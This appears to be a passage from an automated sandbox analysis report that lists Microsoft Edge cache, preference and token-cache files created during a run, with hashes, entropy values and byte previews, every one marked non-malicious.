Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.019005359030933
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQeTUEDSXy:YWLSGTt1o9LuLgfGBPAzkVj/T8lQLy
MD5:	0107FBE97FB03A8BD4F8B9D09F217C47
SHA1:	67A889F5E55DC09094C99881B844EBA01800AABE
SHA-256:	6940E8F8E5DE58D001139D5A023FC8603C6B8FE8FBC94B242666FD967D5C28A5
SHA-512:	092D368B64535CEA99DBAA7779E9E8C73BF9D732A585D8557FDFD5940B0040E26A6E016E69BEB35FF36E38F7325BDD02CA70720ECE9E4AF895252CF2303D39A4
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735380636185372}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a586128a-fb24-4842-b3e3-d87cc5f486b6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44616
Entropy (8bit):	6.095377486704919
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBucg2T9kPccGoup1Xl3jVzXr4CW:z/Ps+wsI7ynEy6Aychu3VlXr4CRo1
MD5:	0019AECA7D573462F60247B1234A8126
SHA1:	DF5281C0574C7D19D9738219CD721785B4234DF1
SHA-256:	F47BFD8CB3DF781764F31FD44DA6894D5FE7B52CD7CC740685FB047D36AA2710
SHA-512:	9E22E165729F151D3A2454990F3DC84CDD8512709C03B9CF532CE82AB9784C1B44E04E1FA174043B356AE030C5F8956010D1F9D03EECADB5A81DA1D53928496E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b6bf6959-a76a-420b-9c70-f0dd944eed3c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44624
Entropy (8bit):	6.095145631604925
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBu8fMWrfFkquZcGoup1Xl3jVzXq:z/Ps+wsI7ynEy6Atchu3VlXr4CRo1
MD5:	B9D95C420540C483BFFF6FCA21C2B8F0
SHA1:	AB5548916CF61F2B6AE50A23652807C44BC340E5
SHA-256:	C08BFBFC4BC00A5F2C0505B9C3B779963C80595EAA4CEB0CE1AD099252297306
SHA-512:	0777EACBA134E60B87B4181B0B1DE147B06B0581FA3110DA1EBFDCDDECA846DE6F136B246BEBA6AA81EE8A444B1DFCAF7DF8C0E6FAC78F4425EE2E7E7CD9B866
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\bd5127a5-dcea-4772-943d-cc49459fa4b9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44699
Entropy (8bit):	6.094843964108121
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkBjwu/hDO6vP6OfBu25M9U78PIHcGoup1Xl3jVzXr2:z/Ps+wsI7yOEa6A0chu3VlXr4CRo1
MD5:	3B89AEEA96B6F6BD2DC49D0566EC94EF
SHA1:	5E97DD6C3A6FF643B4949972CC984C6EE92B30CD
SHA-256:	E0F0A11F1776E13F9662BB60EC0BE579C8BEA1D52239A14B793332A4ADA64B46
SHA-512:	585D9A16C3B8B3DA86F62BC11E5EFAE58B6FDB428CCB4E76B8DDA49A842F4A6A46616C00C929E9C3D49D95A524A8558F136EE5634D531B142D3D4950725264F1
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c2d85a32-3a49-4c6d-8de6-16182d1f78fa.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090709239120377
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMpwuF9hDO6vP6O+1tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE564tbz8hu3VlXr4CRo1
MD5:	7F4CE5155E00C357A85A6F065833DFED
SHA1:	03ADF05B45B66EC2CA844FBDF392995B2F1E24E6
SHA-256:	B266617CA0DD89C26DA588F14D99F24B008E08B49541770FE16EDC2252A32C39
SHA-512:	084CA174A68B07A56797CC4C0AE2EA8A790C4D7300B3A4D70CAD81054D5243E21510E42B9A8F522431DD71DE8D4998384FEB1072930F9DEFC0A7E0C3FE78BD5B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\dacca330-f93b-40c8-b242-7bb447dffa29.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44616
Entropy (8bit):	6.095377486704919
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBucg2T9kPccGoup1Xl3jVzXr4CW:z/Ps+wsI7ynEy6Aychu3VlXr4CRo1
MD5:	0019AECA7D573462F60247B1234A8126
SHA1:	DF5281C0574C7D19D9738219CD721785B4234DF1
SHA-256:	F47BFD8CB3DF781764F31FD44DA6894D5FE7B52CD7CC740685FB047D36AA2710
SHA-512:	9E22E165729F151D3A2454990F3DC84CDD8512709C03B9CF532CE82AB9784C1B44E04E1FA174043B356AE030C5F8956010D1F9D03EECADB5A81DA1D53928496E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fd37c5fe-7126-4094-b162-819916c99977.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44640
Entropy (8bit):	6.095269365910976
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBLwu/hDO6vP6OfBuowMW5E+xPRocGoup1Xl3jVzXq:z/Ps+wsI7ynEy6A0chu3VlXr4CRo1
MD5:	B29D038EE885572A14773A92F96B440A
SHA1:	32EF99766DC6C842BC72B0F9FE65166607E88A13
SHA-256:	1BAA113477EC649694873495CB64501E2A5A0B7B1C7ABB6D34C5EC4CD374C6ED
SHA-512:	8F3B6E6C51D79A5C46385CBB7B6E02F04FB972D1823D1601FA99CFF2CEF9FA14160C67E83DC92D3F6200A8701983CEE7FE8C892C6442B8CDD493BCD321CCC0C0
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.84630300998656
Encrypted:	false
SSDEEP:	48:uiTrlKxrgx/xl9Il8ug8Kus9GhG+mUESEpzM769d1rc:mWYXKusN/UESEpwZ
MD5:	8738DDC1B889824A9060AFFBB69BD126
SHA1:	FCC98695B4227CF0C8485C2FC6F0E03ED22030A8
SHA-256:	40770C87DD58CDC1FA370C7296A7FFC48AEB1B2898ACF076FD85FE7565143541
SHA-512:	7A794DDF2F141CF15815EE8C9FF3F128CAF13B10EE6412B85C5DB2AF9D9A6182A62A497740D30DB9674392BC9921E4FA1E5C2A082DCB2DA8395791775F04DD24
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.B.H.t.a.y.5.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.+.F.G.A.J.W.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	4.001532801295402
Encrypted:	false
SSDEEP:	96:DRYXKE6I4Bat7vJmMHVdFv+M/wmUW9/rJ9VeUp67rgwlnyG:DRPQsat7fV39PUOJneUpqFP
MD5:	533D32BDF5E08A1E393C881895782C91
SHA1:	D2168DB877B87823C360F631A5DB6F595BF89AFA
SHA-256:	F4A45DFBD54727EFF99863F7A5537312F8D85DBC7E701E97CC36CF322C6A7A6F
SHA-512:	D664963676623702331AE582A8E634DF9E85AE3760F2E888ECEA047492C77DEA7FC9AB935EB889C5E09522BBF155AA020FDFB8CE78339C40816E448F880E61B5
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".c.c.D.n.U.S.Z.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.+.F.G.A.J.W.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.897540755848233
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xyxl9Il8ug8KgHV0djdwTATXNqWmjzBIK+Jm+YW+Vi5ATd/vc:agYXKG0hdwTU96IbJPYTO
MD5:	BA515C8F8B34ACD514291224B7C4EB01
SHA1:	44766F7F3D760097DD13349163F004CA9D1A7819
SHA-256:	AF201AABAC1A4B3FEBA5FB39E2AEF525F1B7FB97D7659260901F9E6E9BC5E3C1
SHA-512:	AB5DB702A570C182B513EFE3AC062ECD82612C8A623B853D02AF074CBB880508CA1570267A5701E341D2D24C473E62B65927C6647478C061EB2A096B57A2F8DA
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".b.r.s.K.g.v.d.2.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.